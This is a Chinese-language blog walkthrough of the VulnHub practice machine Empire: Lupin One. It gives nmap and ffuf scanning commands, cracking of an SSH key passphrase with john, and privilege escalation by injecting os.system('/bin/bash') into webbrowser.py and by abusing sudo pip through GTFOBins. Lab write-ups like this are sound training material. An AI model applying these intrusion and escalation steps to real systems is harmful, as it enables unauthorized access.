vulnhub靶机练习:01-Empire-Lupin-One

发布时间 2023-06-24 20:34:26作者: 我还没有吃饭

这次用的是Oracle VM VirtualBox,避免用vmware出现的问题

靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/

arp-scan -l   扫描ip

 

kali:172.88.6.144

靶场:172.88.6.63/

1、扫描ip

nmap -A -sV -T4 -p- 172.88.6.63

 1.1 尝试访问ip

 1.2 目录扫描      dirb http://172.88.6.63/

扫描的结果又很多

 

 http://172.88.6.63/manual/ 

 

 打开页面源代码,发现

 1.3 使用 ffuf 工具暴力破解目录

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://172.88.6.63/~FUZZ'

 

http://172.88.6.63/~secret/

 

 

 

ffuf -u "http://172.88.6.63/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

找的过程不是太顺利

 http://172.88.6.63/~secret/.mysecret.txt

注意前面是有一个点  .mysecret.txt

 好像是BASE58能解开

 

将私钥复制到ssh.key文件中,注意kali的私钥命名方式

/usr/share/john/ssh2john.py ssh.key > hash

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

找到密码   P@55w0rd!

 

想了半天,用户名是那个,于是向前找了找

 用户名:icex64   密码:P@55w0rd!

 

出现这个问题,百度了也找人了,终于给出结果了,是我在复制秘钥的时候出现了问题

 用vim写秘钥,将秘钥复制在vim的siyao.key中,给个600的权限

ssh icex64@172.88.6.63 -i siyue.key 

 

然后就进来了

2.提权

发现一个文件

 

find / -perm -u=s -type f 2>/dev/null

 

 这里找到一个

icex64@LupinOne:~$ whereis webbrowser.py
webbrowser:
icex64@LupinOne:~$ locate webbrowser.py

icex64@LupinOne:~$ python --version
-bash: python: command not found
icex64@LupinOne:~$ python3 --version
Python 3.9.2

 

 

 看到这个两个文件与一个适合我们用的

修改 webbrower.py,添加以下代码

os.system ("/bin/bash")

 使用 vi 打开文件:vim /usr/lib/python3.9/webbrowser.py

执行以下命令切换 shell: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

 访问:https://gtfobins.github.io/,查询 pip

 

 

 把这上面的代码复制下放到里面提权

 

 用到dirb、ffuf,还有GTFOBins,只能积累了

细节方面,在使用 ffuf 工具暴力破解目录和私钥的时候,注意别弄错了